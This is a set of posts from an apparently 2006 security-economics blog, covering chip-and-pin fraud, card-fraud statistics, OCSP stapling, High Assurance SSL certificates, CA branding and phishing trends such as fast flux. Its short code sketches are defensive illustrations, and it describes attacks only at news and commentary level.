    Alternatively, let's look at the US data brokers market. There, lots and lots of data is shared without necessarily concentrating on tiny pickings like credit theft identifiers. (Some of it you might know about, and you may even be rewarded for some of it. Much is just plain stolen out of sight. But that's not today's question.) So how much would one of those data brokers pay for *full* access to my mailbox?

    Let's assume I'm a standard boring rich country middle class worker bee.

    Another way to look at this is to look at google. It makes most of its money in advertising, and it does this on the tiny hook of your search query. It is also experimenting with "catalogue your hard drive" products (as with Apple's Spotlight; no doubt Microsoft and Yahoo are hyperventilating over this already). So it must have a view as to the value of *everything*.

    So, what would it be worth to those companies to *sell* the entire monitoring contents of my email, etc, for a year to Yahoo, Google, Microsoft, or Apple? Imagine a market where instead of credit card offers to my dog clogging up my mailbox, I get data sharing agreements from the big friendly net media conglomerates.

    Sponsored Link
    Google Head Specials
    www.google.com/headspecials
    Failing to nail your hammer?   Your marketing seems like all thumbs?
    Try Google's get-in-his-head program.
    Today only: Iang's emails, buy one, get two free.


    Does anyone know any data brokers? Does anyone have hooks into google that can estimate this?

    Posted by iang at 06:43 AM | Comments (6) | TrackBack

    May 22, 2006

    It is no longer acceptable to be complex

    Great things going on over at FreeBSD. Last month was the surprising news that Java was now distro'd in binary form. Heavens, we might actually see Java move from "write once, run twice" to numbers requiring more than 2 bits, in our lifetimes. (I haven't tried it yet. I've got other things to do.)

    More serious is the ongoing soap opera of security. I mean over all platforms, in general. FreeBSD still screams in my rankings (sorry, unpublished, unless someone blogs the secret link again, darnit) as #2, a nose behind OpenBSD for the top dog spot in the race for hard core security. Here's the story.

    Someone cunning (Colin?) noticed that a real problem existed in the FreeBSD world - nobody bothers to update, and that includes critical security patches. That's right. We all sit on our haunches and re-install or put it off for 6-12 months at a time. Why?

    Well, why's a tricky word, but I have to hand it to the FreeBSD community - if there is one place where we can find out, that's where it is. Colin Percival, security czar and general good sort, decided to punch out a survey and ask the users: why? Or, why not? We haven't seen the results of the survey, but something already happened:

    Polite, professional, thoughtful debate.

    No, really! It's unheard of on an Internet security forum to see such reasoned, considered discussion. At least, I've never seen it before, I'm still gobsmacked, and searching for my politeness book, long lost under the 30 volume set of Internet Flames for Champions, and Trollers Almanacs going back 6 generations.

    A couple of (other) things came out. The big message was that the upgrade process was either too unknown, too complex, too dangerous, or just too scary. So there's a big project for FreeBSD sitting right there - as if they need another. Actually this project has been underway for some time, it's what Colin has been working on, so to say this is unrecognised is to short-change the good work done so far.

    But this one's important. Another thing that delicately poked its nose above the waterline was the contrast between the professional sysadmin and the busy other guy. A lot of people are using FreeBSD who are not professional sysadmins. These people haven't time to explore the arcania of the latest tool's options. These people are impressed by Apple's upgrade process - a window pops up and asks if it's a good time, please, pretty please? These people not only manage a FreeBSD platform or 10, but they also negotiate contracts, drive buses, organise logistics, program big apps for big iron, solve disputes with unions and run recruiting camps. A.k.a., business people. And in their lunchbreaks, they tweak the FreeBSD platforms. Standing up, mouth full.

    In short, they are gifted part-timers. Or, like me, trained in another lifetime. And we haven't the time.

    So it is no longer - I suggest - acceptable for the process of upgrades and installs to be seriously technical. Simplification is called for. The product is now in too many places, too many skill sets and too many critical applications to demand a tame, trained sysadmin full time, right time.

    Old hands will say - that's the product. It's built for the expert. Security comes at a cost.

    Well, sort of - in this case, FreeBSD is hoisted on its own petard. Security comes at a risk-management cost. FreeBSD happens to give the best compromise for the security minded practitioner. I know I can install my machine, not do a darn thing for 6 months, and still be secure. That's so valuable, I won't even bother to install Linux, let alone look up the spelling of whatever thing the Microsoft circus are pushing this month. I install FreeBSD because I get the best security bang for buck: No necessary work, and all the apps I can use.

    Which brings us to another thing that popped out of the discussion - every one of the people who commented was using risk management. Seriously! Everyone was calculating their risk of compromise versus work put in. There is no way you would see that elsewhere - where the stark choice is either "you get what you're given, you lucky lucky microsoft victim" all the way across to the more colourful but unprintable "you will be **&#$&# secure if you dare *@$*@^# utter the *#&$*#& OpenBSD install disk near your (*&@*@! machine in vain."

    Not so on FreeBSD. Everyone installs, and takes on their risks. Then politely turns around and suggests how it would be nice to improve the upgrade process, so we can ... upgrade more frequently than those big anniversaries.

    Posted by iang at 05:38 PM | Comments (5) | TrackBack

    May 16, 2006

    Freshfaced risks: Licensed to Secure, 007 seconds out of College, a Risky Future indeed!

    Stanley Quayle on Risks raises the possibility that computer security work may require a licence:

    > Some computer professionals will need to get a Private Investigator license
    > just to continue doing their computer work.

    The Ohio law requires this already:

    The business of private investigation is [...] determine the cause of or responsibility for [...] damage to property, or to secure evidence for use in any legislative, administrative, or judicial investigation or proceeding.

    > I imagine this will also apply to accountants and auditors

    The law exempts, among other groups, lawyers and accountants.

    > We will have to be asking suppliers of firewall, anti-virus, anti-spam,
    > anti-spyware etc. if they have a PI license

    Ohio law also exempts licensed professional engineers. Ask your supplier if they employ professional engineers -- after all, your software should follow sound engineering principles.

    My signature line includes "P.E.", which stands for Professional Engineer. Now I know why I got my license...

    (The source is a bit obscured above, I don't have the original.)

    I said earlier that Security is the market for silver bullets. Michael Spence says they pack silver bullets in Education. So if we look at the market for Security Education, we'd be surely loaded for vampire, right?

    Now, CISSPs can be had at (US) college - just by doing some extra classes.

    This fall, Peirce College will join Florida's St. Petersburg College as the second school offering classes tied to the domains of knowledge for both the CISSP and the Systems Security Certified Practitioner (SSCP). Combined with other college courses, a student can not only enter the workforce with either an associate's or bachelor's degree, but also having passed one of the International Information Systems Security Certification Consortium's exams. Due to experience requirements for both certifications, the candidate does not actually get the CISSP or SSCP designation until the experience has been obtained. This program will not be unique to these two schools, as the ISC(2) hopes to sign up as many as 100 colleges to offer its courses.

    007 seconds out the door, students are licensed to secure, but only as Associates.

    The good side to this run of bad news is that maybe this will be the nudge we need to get rid of the plague of security experts. First we flood the market with Junior CISSPs, Associate Black Hats, Lieutenant Hackers, PenTesters in Training, ... then we license them all? Then round them up, brand them and ship 'em off to the camps! Yeah! Cisspocide!

    It's a natural progression from a truly disastrous year for security. E.g., convictions for due diligence, large companies being allowed to run rootkits without fear of prosecution, anti-virus companies not picking up said rootkits, security companies pricing exploit data to the highest bidder, a progression of laws on this and that, and that's only the headlines.... In the face of that, licensing and inexperienced security certifications are quite benign.

    With all this, we might as well abandon the very word. Yet, what's a poor hacker to do? Chandler Howell, stalwart defender of risk management, rides to the rescue with the very definitions:

    Short Form: Information Security locks up information to keep it safe, whether or not that’s the best thing to do with it. *Information Risk Managers* figure out the best way to preserve the value of the information, which may or may not include locking it up.

    Go Chandler! Can we hold the line on risk management? Or is it only another decade or so before we need to be licensed to understand and manage our own risks? And we're all back to college to read books entitled "The SOX way to Risk-free management and fast retirement?"

    Who knows, but let's close with his Slightly Longer Form:

    Information Security is the practice of designing and implementing countermeasures and other preventative (usually technical) controls on information. Security experts tend to understand the nuances of their tools, but all-too-often fall prey to the adage that, “When your only tool is a hammer, every problem begins to look a lot like a nail.”

    Information Risk Management (IRM) is the practice of determining which Information Assets need protection and what level of protection is required, then determining appropriate methods of achieving that level of protection by understanding the applicable vulnerabilities, threats and countermeasures.

    To practice IRM successfully means understanding not just the technologies that enable communication but also the business that the communication enables, the applicable regulatory environment, how information is utilized, the circumstances under which it might have value to an attacker, and how to balance those variables based on the risk appetite and cost-consciousness of the business.

    Posted by iang at 04:57 AM | Comments (1) | TrackBack

    May 10, 2006

    JIBC April 2006 - "Security Revisionism"

    The April edition of J. Internet Banking and Commerce is out and includes an essay on "Security Revisionism" that addresses outstanding questions from an economics pov:

    Security isn't working, and some of us are turning to economics to address why this is so. Agency theory casts light on cases such as Choicepoint and Lopez. An economics approach also sheds light on what security really is, and social scientists may be able to help us build it. Institutional economics suggests that the very lack of information may lead to results that only appear to speak of security.

    Other than my opinions (and others), here's the full list:

    General and Review Articles



    Research Papers


    Posted by iang at 06:16 AM | Comments (4) | TrackBack

    May 09, 2006

    Chip-and-Pin terminals were replaced by "repairworkers"?

    In comments to the chip-and-pin fraud story, Lynn points to:

    Chip and pin hack exposed

    According to our source, a team of shysters has been turning up at petrol stations posing as engineers and taking the Trintech Smart5000 Chip and Pin units away for repair. They have then bypassed the anti-tamper mechanisms and inserted their own card skimmer.

    ... snip ...

    this could also be considered from the angle of my old security proportional to risk theme

    That might explain all the arrests, as they could have gone and examined the videos to see who the repairmen actually were.

    The attack on the merchant terminals reminds me of the old one-way-triangle chipmoney designs. They used in general a diversified key arrangement, so if you cracked a user card then you could only duplicate that one card. This threat was addressed by blacklisting within the system (there were all sorts of secret instructions and capabilities in these chip money products, some of which got them into hot water from time to time because of the secrecy).

    So, with the diversified key design, the limitation was that the upstream merchant card had to hold the full key; only the downstream user card would hold the diversified key. (Think of it as k and H(k): the holder of k can derive H(k), but the holder of H(k) cannot recover k.)
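    As a sketch of the arrangement - assuming an HMAC-style derivation purely for illustration, where the real chipmoney schemes used their own, often secret, functions:

        import hmac, hashlib

        MASTER_KEY = b"issuer master key, held in the merchant-side device"

        def diversified_key(card_id: bytes) -> bytes:
            # Each user card carries H(k, card_id): cracking one card
            # yields only that card's key, never the master k.
            return hmac.new(MASTER_KEY, card_id, hashlib.sha256).digest()

        def merchant_verify(card_id: bytes, challenge: bytes,
                            response: bytes) -> bool:
            # The merchant device re-derives the card key from the master
            # - which is exactly why it must be guarded more carefully
            # than any single user card.
            expected = hmac.new(diversified_key(card_id), challenge,
                                hashlib.sha256).digest()
            return hmac.compare_digest(expected, response)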

    Which simply shifts the burden of the attack to the merchant, so the merchant in theory had to secure the card in his device more carefully than a user card. I pointed this out on occasion, but it was not considered a grave risk - mostly, I suspect, because it was actually a "shifting the burden" pattern, a la Senge. That is, cognitively, the story had an answer, and going the extra distance to analyse the new story was beyond saturation point.

    This is apparently the device, Trintech:

    The Smart 5000 PED

    The Smart 5000 is based on an ARM7 processor, with MMU (memory management unit). It boots a 2.4 series embedded Linux kernel from 4MB of Flash (8MB optionally available). The device includes 16MB of SDRAM, and 512K of SRAM.

    Trintech's Smart 5000 PIN entry device

    Standard I/O ports include an RS-232 serial port, and USB. Optional ports include PSTN (public switched telephone network), ISDN (integrated service digital network), and IP/LAN (Ethernet).

    The Smart 5000 includes an 8-line, 132 x 64 pixel backlit graphics display, along with 15 keys and 6 programmable keys. It also contains an EMV L1 certified chip card reader; a Track 1, 2, & 3 magswipe reader; and 3 additional SIM/SAM readers.

    The Smart 5000 measures 8 x 4.3 x 4.7 inches (205 x 110 x 120 mm).

    Trintech's Linux-based Smart 5000 PED received certification by Visa as a secure PED in October, 2003. The device also sports certified encryption capabilities for DES, 3DES, RSA (2048-bit key length), with countermeasures against DPA, DFA, and DTA. It also supports SHA-1 and DUKPT.

    Posted by iang at 05:40 AM | Comments (7) | TrackBack

    May 06, 2006

    Petrol firm suspends chip-and-pin

    Lynn points to BBC on: Petrol giant Shell has suspended chip-and-pin payments in 600 UK petrol stations after more than £1m was siphoned out of customers' accounts. Eight people, including one from Guildford, Surrey and another from Portsmouth, Hants, have been arrested in connection with the fraud inquiry.

    The Association of Payment Clearing Services (Apacs) said the fraud related to just one petrol chain. Shell said it hoped to restore the chip-and-pin service before Monday.

    "These Pin pads are supposed to be tamper resistant, they are supposed to shut down, so that has obviously failed," said Apacs spokeswoman Sandra Quinn. Shell has nearly 1,000 outlets in the UK, 400 of which are run by franchisees who will continue to use chip-and-pin.

    A Shell spokeswoman said: "We have temporarily suspended chip and pin availability in our UK company-owned service stations. This is a precautionary measure to protect the security of our customers' transactions. You can still pay for your fuel, goods or services with your card by swipe and signature. We will reintroduce chip and pin as soon as it is possible, following consultation with the terminal manufacturer, card companies and the relevant authorities."

    BP is also looking into card fraud at petrol stations in Worcestershire but it is not known if this is connected to chip-and-pin.

    And immediately followed by more details in this article: Customers across the country have had their credit and debit card details copied by fraudsters, and then money withdrawn from their accounts. More than £1 million has been siphoned off by the fraudsters, and an investigation by the Metropolitan Police's Cheque and Plastic Crime Unit is under way.

    The association's spokeswoman Sandra Quinn said: "They have used an old style skimming device. They are skimming the card, copying the magnetic details - there is no new fraud here. They have managed to tamper with the pin pads. These pads are supposed to be tamper resistant, they are supposed to shut down, so that has obviously failed."

    Ms Quinn said the fraud related to one petrol chain: "This is a specific issue for Shell and their supplier to sort out. We are confident that this is not a systemic issue."

    Such issues have been discussed before.

    Posted by iang at 10:08 AM | Comments (11) | TrackBack

    April 19, 2006

    Numbers on British Fraud and Debt

    A list of numbers on fraud, allegedly from The Times (also) repeated here FTR (for the record).

    INTERNET CHATROOM PRICE LIST

    Regular credit card number: $1
    Credit card with 3-digit security code: $3-$5
    Credit card with code and PIN: $10-$100
    Social security number (US): $5-$10
    Mother's maiden name: $5-$10
    THE BIG NUMBERS
    £56.4 ($100) billion: Total amount owed on British credit cards
    141.1 million: Number of credit, debit and charge cards in Britain
    1.9 billion: Number of purchases on credit and charge cards in Britain a year
    £123 billion: Total value of credit and charge card purchases a year
    5: Number of credit, debit and charge cards held by 1 in 10 consumers
    £58: Average value of a purchase on a credit card
    £41: Average value of a debit card purchase
    88 percent: Proportion of applicants who have been issued with a credit card without providing proof of income
    £504.8 ($895) million: Total plastic-card fraud losses on British cards a year
    £1.3 ($2.3) million: Amount of fraud committed against cards each day
    7: Number of seconds between instances of fraud
    £696 ($1,235): Average size of fraud, 2004

    (Printing them in USD is odd, but there you go... I've preferred the Times' UKP amounts above, as there were a number of mismatches.)

    Posted by iang at 10:01 AM | Comments (2) | TrackBack

    April 18, 2006

    Security Gymnastics - Risk-based from RSA, security model rebuilding from MS, and taking revocation to the next level?

    RSASecurity is now pushing a thing called Adaptive Authentication

    The risk-based authentication module is a behind-the-scenes technology that is designed to score the level of risk associated with a given activity or transaction—like account logon, bill payment or wire transfer—in real time. If that activity exceeds a predetermined risk threshold the user is prompted for an additional authentication credential to validate his or her identity. ...

    One-time password authentication offers tangible, time-honored security for the segments of your user base who routinely engage in sufficiently risky activities or who feel better protected by physical security, and will reward your institution for providing this through consolidation of assets and increased willingness to transact online.

    It's hard to find a pithy statement of reliability amongst the hypeware, but basically this seems to be offering a choice of authorisation methods, based on the risk. The essence here is four-fold. First, we are now seeing the penny drop for suppliers: security is proportional to risk. Secondly, note the per-transaction emphasis; a sketch of that pattern follows below. RSASecurity are half way to a real solution to the meccano / MITB threat, but given their current line up of product, they are stuck for the time being. Thirdly, this confirms the Cyota trend spotted before. That's smart of them.
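    Here's a minimal sketch of the risk-based pattern - the weights and threshold are invented for illustration, RSA's actual scoring model being proprietary:

        RISK_THRESHOLD = 50

        def risk_score(tx: dict) -> int:
            # Toy scoring: each risky attribute of the transaction adds weight.
            score = 0
            if tx["amount"] > 1000:
                score += 40
            if tx["new_payee"]:
                score += 30
            if tx["country"] != tx["usual_country"]:
                score += 30
            return score

        def authorise(tx: dict) -> str:
            # Low risk proceeds on the session credential alone; high risk
            # is stepped up to an additional credential, per transaction.
            if risk_score(tx) < RISK_THRESHOLD:
                return "proceed"
            return "challenge: one-time password required"

        print(authorise({"amount": 2500, "new_payee": True,
                         "country": "RO", "usual_country": "UK"}))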

    Finally, recall the security model that we all now dare not mention (#11). It's war with Eurasia, as always. Further hints of this have been revealed over at emergent chaos, where Adam comments on Infocard:

    For me, the useful sentence is that 'Infocard is software that packages up identity assertions, gets them signed by an identity authority and sends them off to a relying party in an XML format. The identity authority can be itself, and the XML is SAML, or an extension thereof, and the XML is signed and encrypted.'

    Spot it? As reported earlier, Microsoft is moving to put Infocard in place of any prior security model that might have existed (whatever its unname) and as we now are rebuilding the security model from scratch, it makes sense to ... have the user issue her own credentials as that will build user-base support. Oh-la-la! I wonder if they are going to patent that idea?

    Over at the NIST conference on PKI, they had lots of talks on trust (!), revocation (!) and sessions on Digital Signatures (!) and also Browser Security (!). I wish I'd been there. I skimmed through the PPT for the Invited Talk - Enabling Revocation for Billions of Consumers (ppt) by Kelvin Yiu, Microsoft, for any correlations to the above (I found none).

    But I did find that IE7 will have revocation enabled by default. What this means in terms of CRL and OCSP checking is unclear, but one curious section entitled "Taking Revocation to the Next Level" described (sit down before reading this) a fix in TLS that will enable the web server to cache the OCSP response and deliver it, pre-fetched, to the browser. All in TLS. Apparently, this act of security gymnastics is called "stapling":

    Revocation in Windows Vista

    How TLS "Stapling" Scales

  • Contoso returns its certificate chain and the OCSP response in the TLS handshake

  • Stapling reduces load on the CA to # of servers, not clients
    I kid you not. According to Microsoft, revocation is to be bundled in TLS - although I would like people to check those slides because I have a sneaking suspicion that NeoOffice wasn't displaying all the content. Anyone from the TLS side care to correct? Please?
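    For reference, the hook for this already exists in the TLS extensions spec as the Certificate Status Request extension (RFC 3546). From the client side it looks something like this - a sketch in modern tooling, assuming the pyOpenSSL and cryptography packages:

        import socket
        from OpenSSL import SSL
        from cryptography.x509 import ocsp

        def stapled_ocsp_ok(conn, ocsp_bytes, data):
            # Called during the handshake with the DER-encoded OCSP
            # response the server stapled in; empty means nothing stapled.
            if not ocsp_bytes:
                print("no OCSP response stapled")
                return True   # lenient for the sketch; a strict client would fail
            resp = ocsp.load_der_ocsp_response(ocsp_bytes)
            if resp.response_status != ocsp.OCSPResponseStatus.SUCCESSFUL:
                return False
            return resp.certificate_status == ocsp.OCSPCertStatus.GOOD

        ctx = SSL.Context(SSL.TLS_METHOD)
        ctx.set_ocsp_client_callback(stapled_ocsp_ok)

        sock = socket.create_connection(("example.com", 443))
        conn = SSL.Connection(ctx, sock)
        conn.set_tlsext_host_name(b"example.com")
        conn.request_ocsp()        # ask the server to staple its response
        conn.set_connect_state()
        conn.do_handshake()
        conn.close()

    The point of the gymnastics: the CA answers once per server, the server hands that signed answer to every client, and the CA's load scales with the number of servers, not clients.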

    Posted by iang at 02:46 PM | Comments (2) | TrackBack

    March 30, 2006

    Professional Associations in IT Security

    Someone wrote to me to ask:

    Are you aware of any professional associations for IT security you could recommend I become a member of?

    I have no answer there - would anyone recommend an association? And more importantly, why?

    Posted by iang at 10:45 AM | Comments (7) | TrackBack

    March 07, 2006

    FraudWatch - Chip&Pin, a new tenner (USD10)

    Chip&Pin in Britain has been measured over a nearly full year of implementation (since February), and fraud was found to have dropped by 13%. They say that's good. Well, it's not bad, but it is a far cry from the 80% figures that I recall being touted when they were pushing it through.

    The Chip and Pin system cut plastic card fraud by 13% in 2005, according to the Association of Payment Clearing Services (Apacs). Losses due to the fraudulent use of credit and debit cards fell last year by £65m to £439m.

    Most categories of fraudulent card use dropped, except for transactions over the phone, internet or by mail. Chip and Pin cards were introduced in 2004, with their use becoming required in shops from February this year.

    The new type of card appears to have brought a decisive turnaround with fraud levels now back to the levels last seen in 2003. In 2004, as the new cards were being introduced, card fraud continued to shoot up, by 20%, costing banks and retailers more than half a billion pounds.

    Sandra Quinn of Apacs hailed the impact of Chip and Pin, which has been rolled out to most of the UK retailing and banking industries since October 2003:

    "Seeing card fraud losses come down is cast-iron proof that Chip and Pin is doing its job. Back in 2002 we forecast that fraud would have risen to £800m in 2005 if we didn't make the move to Chip and Pin so it's heartening to see total losses well beneath this figure" she said.

    So maybe if we factor in such a prediction of 800m, down now to 439, we are seeing a drop of 45% - worked below. I'd say that according to GP they moved too late and ended up with an institutionalised fraud at a high and economic level. Clawing that back is going to take some doing.
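    The arithmetic, for the record - both percentages fall out of the same three numbers:

        # Two ways to count the fall in UK card fraud (figures in GBP millions):
        last_year, this_year, forecast = 504.8, 439.0, 800.0
        print("against last year's actual: %.0f%%"
              % (100 * (last_year - this_year) / last_year))   # ~13%
        print("against the 2002 forecast:  %.0f%%"
              % (100 * (forecast - this_year) / forecast))     # ~45%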

    And, also from PaymentNews, the US mint continues its sly dance to use other colours than green:

    Security Features
    The redesigned $10 note also retains three of the most important security features that were first introduced in the 1990s and are easy to check: color-shifting ink, watermark and security thread.

    Color-Shifting Ink: Tilt your ten to check that the numeral "10" in the lower right-hand corner on the face of the note changes color from copper to green. The color shift is more dramatic on the redesigned notes, making it even easier for people to check their money.

    Watermark: Hold your ten up to the light to see if a faint image of Treasury Secretary Alexander Hamilton appears to the right of his large portrait. It can be seen from both sides of the note. On the redesigned $10 note, a blank oval has been incorporated into the design to highlight the watermark's location.

    Security Thread: Hold your ten up to the light and make sure there's a small strip embedded in the paper. The words "USA TEN" and a small flag are visible in tiny print. It runs vertically to the right of the portrait and can be seen from both sides of the note. This thread glows orange when held under ultraviolet light.

    To protect our economy and your hard-earned money, the U.S. government expects to redesign its currency every seven to ten years.

    Everything is good fun about that page, even the URL!

    Posted by iang at 05:10 AM | Comments (16) | TrackBack

    February 21, 2006

    Major Browsers and CAs announce Balkanisation of Internet Security

    GeoTrust, recently in trouble for being phished over SSL, has rushed to press a defensive PR that announces their support for high assurance SSL certificates. As it reveals a few details on this programme, it's worth a look:

    The new High Assurance SSL certificate standard, which is being defined by leading browser companies including Microsoft, Mozilla and Opera, in partnership with Certificate Authorities including GeoTrust and VeriSign, as well as the American Bar Association Information Security Committee, will entail a higher level of business verification than any Certificate Authority's current vetting methods. Additionally, High Assurance SSL certificate identity information will be clearly displayed in the new-generation browsers, so that consumers will easily be able to discern that they are indeed at the site they think they are, and not a fraudulent version of a popular website.
    ...

    The new specification for verifying identities for the new High Assurance SSL certificate is expected to be finalized in the coming months. The vetting process will be much more comprehensive than any Certification Authority's current vetting standards, which primarily rely on email and faxed information, database lookups and phone calls before issuing an SSL certificate. Today, these processes vary from Certificate Authority to Certificate Authority, and encompass an array of manual and automated processes. Key to the new High Assurance certificates is a standardized process across Certificate Authorities for verifying information that will include: verifying the organization's identity; verifying that the would-be purchaser has the legal authority to make the SSL certificate request for that organizational entity; and confirming that the entity is a legitimate business, not a shell or false front entity.

    OK, what can we learn from that? The browser manufacturers and the CAs have teamed up. Mozilla and Opera are being teased out of the closet. The specification has not been completed, but the "speed" of the phishing onslaught is overtaking the measured response of the ones that know better.

    My own view of this is that it won't work out as well as the champions are yelling it will. Primarily, it will simply shift the traffic to other areas, until a new balance is reached. In some sense this could be ludicrous, as salesmen run around following phishing victims to sell them HA certs. In other senses, the sense of strategic gameplay for those who know is just too amusing for words. In yet other senses, it proves the branding model, and proves the liability model. Unforeseen consequences in spades.

    When the new balance is reached, the High Assurance will be Highly Breached, just like the GeoTrust cert of last week. That doesn't mean that this won't do some good - it surely will. But with that good comes a huge price tag, and frankly, it looks like it is not worth the price that user sites will have to pay. Especially in comparison to the better and cheaper solutions that have been designed and developed over the 2-3 years since this was first proposed.

    A Microsoft Internet Explorer developer's weblog has published extensively on the new security features in IE 7, the work of the browser and Certificate Authority initiatives, and includes examples of how the new High Assurance SSL certificate information would display within the new Internet Explorer browser.

    Chris Bailey, GeoTrust's chief technical officer, stated: "For over a year, a dozen companies have been meeting to find new ways to address the issue of phishing and restore consumer confidence in online transactions. The result is that we will have one standard, with a thoroughly defined vetting process, for the issuance of High Assurance SSL certificates. While not every site will require them, it is our view that financial institutions and large e-tailers will want to convey this added assurance to their customers."

    Yet more concerning is the introduction of a standardised process across CAs that will dramatically increase the cost of these certs. A dozen of them have been meeting for a year! So all this spells bad news for smaller browsers and smaller CAs, who have been excluded from the meetings and are presumably going to be pushed to implement a standard they have no control over, after everyone else has done so. Or not as the case may be.

    Posted by iang at 07:05 PM | Comments (1) | TrackBack

    February 19, 2006

    Branded Experiments

    Adam writes that he walks into a hotel and gets hit with a security brand.

    For quite some time, Ian Grigg has been calling for security branding for certificate authorities. When making a reservation for a Joie de Vivre hotel, I got the attached Javascript pop-up. (You reach it before providing a credit card number.)

    I am FORCED to ask, HOWEVER, what the average consumer is supposed to make of this? ("I can make a hat, and a boat...") Who is this VERISIGN, and why might I care?

    Well, precisely! They are no-one, says the average consumer, so anything they have done to date, including the above, is irrelevant.

    More prophetically, one has to think of how brand works when it works - every brand has to go through a tough period where it braves the skeptics. Some of the old-timers might recall rolling around the floor laughing at those silly logos that Intel were putting in other suppliers' adverts! And stickers on laptops - hilarious!

    These guys will have to do that, too, if things are to come to pass this way. It will involve lots of people saying "so what?" until one day, those very same skeptics will say "Verisign... now I know."

    The word Verisign isn't a link. It's not strongly tied to what I'm seeing. (Except for the small matter of legality, I could make this site pop up that exact same dialog box.) It is eminently forgeable, there's no URL, there's nothing graphical.

    Right, so literally the only thing going on here is a bit of branding. The brand itself is not being used as part of a security statement in any sense worthy of attention. To recap, the statement we are looking for is something like "Comodo says that the certificate belongs to XYZ.com." That's a specific, verifiable and reliable statement. What you're seeing on the ihotelier page is a bit of fluff.

    Nevertheless, it probably presages such dialog boxes popping up next to the colored URL bar, and confusing the message they're trying to send.

    I guess it presages a lot of bad experimentation, sure. What should be happening in the coloured URL bar is simply that "CAcert claims that Secure.com is who you are connected to." It's very simple: a. the remote party, b. the CA, and c. the statement that the CA says the remote party is who it is. Oh, and I almost forgot: d. on the chrome so no forgeries, thanks, Mr Browser.

    Why does all this matter? To close the loop. Right now, Firefox says you are connected to Paypal.com. And IE6 says you are connected to BoA. If you get phished, it's the browser that got it wrong, not the CA. As the CA is the one that collected the money for securing the connection, we need to reinsert the CA into the statement.

    So when the user sues, she does so on the proper design of the PKI, not some mushed up historical accident.
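
    (The raw material for that statement is already sitting in the TLS handshake, by the way. Here's a minimal sketch of pulling it out and rendering it - Python, with a hypothetical target host, and the CA's organisation name standing in for its brand:)

        import socket, ssl

        def security_statement(host: str, port: int = 443) -> str:
            """Render the peer certificate as the statement we want:
            '<CA> says that the certificate belongs to <site>'."""
            ctx = ssl.create_default_context()
            with socket.create_connection((host, port)) as tcp:
                with ctx.wrap_socket(tcp, server_hostname=host) as tls:
                    cert = tls.getpeercert()
            # getpeercert() returns subject/issuer as tuples of RDN pairs
            def field(part, name):
                return dict(rdn[0] for rdn in cert[part]).get(name, "?")
            ca = field("issuer", "organizationName")
            site = field("subject", "commonName")
            return f"{ca} says that the certificate belongs to {site}"

        print(security_statement("www.example.com"))  # hypothetical host

    Of course, printing it in a script proves nothing - the whole point of d. above is that the browser has to render that sentence on the chrome, where a page can't fake it.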

    Posted by iang at 01:45 PM | Comments (1) | TrackBack

    More dots than you or I can understand (Internet Threat Level is Systemic)

    fm points to Gadi Evron who writes an impassioned plea for openness in security. Why? He makes a case that we don't know the half of what the bad guys are up to. His message goes something like this:

    DDoS -> recursive DNS -> Fast Flux -> C2 Servers -> rendezvous in cryptographic domainname space -> bots -> Phishing

    Connecting the dots is a current fad in America, and I really enjoyed those above. I just wish I knew what even half of them meant. Evron's message is that there are plenty of dots for us all to connect, so many that the tedium of imminent solution is not an issue. He attempted to describe them a bit later with his commentary on the recent SSL phishing news:

    Some new disturbing phishing trends from the past year:

    POST information in the mail message
    That means that the user fills his or her data in the HTML email message itself, which then sends the information to a legit-looking site. The problem with that, is how do you convince an ISP that a real (compromised) site is indeed a phishing site, if there is no phishy-looking page there, but rather a script hiding somewhere?

    Trojan horses
    This is an increasing problem. People get infected with these bots, zombies or whatever else you’d like to call them and then start sending out the phishing spam, while alternating the IP address of the phishing server, which brings us to…

    Fast-Flux
    Fast Flux is a term coined in the anti spam world to describe such Trojan horses’ activity. The DNS RR leading to the phishing server keeps changing, with a new IP address (or 10) every 10 minutes to a day. Trying to keep up and eliminate these sites before they move again is frustrating and problematic, making the bottle-neck the DNS RR which needs to be nuked.
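
    (To make the fast flux point concrete: from the defender's side, it is simply a name whose addresses won't sit still. A minimal sketch - the domain is made up, and a real monitor would query the authoritative servers directly rather than trust the local resolver's cache:)

        import socket, time

        DOMAIN = "flux-example.invalid"  # hypothetical phishing domain

        seen = set()
        for _ in range(10):  # a real monitor runs for days, not minutes
            try:
                # collect the A records the resolver currently hands back
                infos = socket.getaddrinfo(DOMAIN, 80, proto=socket.IPPROTO_TCP)
                addrs = {info[4][0] for info in infos}
            except socket.gaierror:
                addrs = set()
            fresh = addrs - seen
            if fresh:
                print(time.strftime("%H:%M:%S"), "new addresses:", sorted(fresh))
                seen |= addrs
            time.sleep(60)  # fast flux TTLs are minutes, so poll each minute

    Each "new addresses" line is another compromised machine fronting the same phishing server - which is why the DNS RR, not the hosts, is the bottleneck that needs to be nuked.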

    We may be able to follow that, but the bigger question is how to cope with it. Even if you can follow the description, dealing with all three of the above is going to stretch any skilled practitioner. And that's Evron's point:

    What am I trying to say here?

    All these activities are related, and therefore better coordination needs to be done much like we do on the DA and MWP groups, cross-industry and open-minded. R&D to back up operations is critical, as what’s good for today may be harmful tomorrow (killing C&C’s as an example).

    The industry needs to get off its high tree and see the light. There are good people who never heard about BGP but eat Trojans (sounds bad) for breakfast, and others need to see that just because some don’t know how to read binary code doesn’t mean they are not amazingly skilled and clued with how the network runs.

    This is not my research alone. I can only take credit for seeing the macro image and helping to connect the dots, as well as facilitate cooperation across our industry. Still, as much as many of this needs to remain quiet and done in secret-hand-shake clubs, a lot of this needs to get public and get public attention.

    Over-compartmentalizing and over-secrecy hurts us too, not just the US military. If we deal in secret only with what needs to be dealt in secret, people may actually keep that secret better, and more resources can be applied to deal with it.
    Some things are handled better when they are public, as obviously the bad guys already know about them and share them quite regularly. “Like candy” when it comes to malware samples, as an example.

    The Internet threat level is now systemic, and has been since the arisal of industrialised phishing, IMO. I've written many times before about the secrecy of the browser sector in dealing with phishing, and how the professional cryptographic community washed its hands of the problem. Microsoft's legendary castles of policy need no reminder, and it's not as if Apple, Sun, Symantec, Verisign or any other security company would ever do any better in measures of openness.

    Now someone over the other side of the phishing war is saying that he sees yet other tribes hiding in their fiefdoms, and I don't even know which tribes he's referring to. Gadi Evron concludes:

    -opinion-Our fault, us, the people who run these communities and global efforts, for being over-secretive on issues that should be public and thus also neglecting the issues that should really remain under some sort of secrecy, plus preventing you from defending yourself.

    Us, for being snobbish dolts and us, for thinking we invented the wheel, not to mention that we know everything or some of us who try to keep their spots of power and/or status by keeping new blood out (AV industry especially, the net-ops community is not alone in the sin of hubris).

    It’s time to wake up. The Internet is not about to die tomorrow and there is a lot of good effort from a lot of good people going around. Amazing even, but it is time to wake up and move, as we are losing the battle and the eventual war.

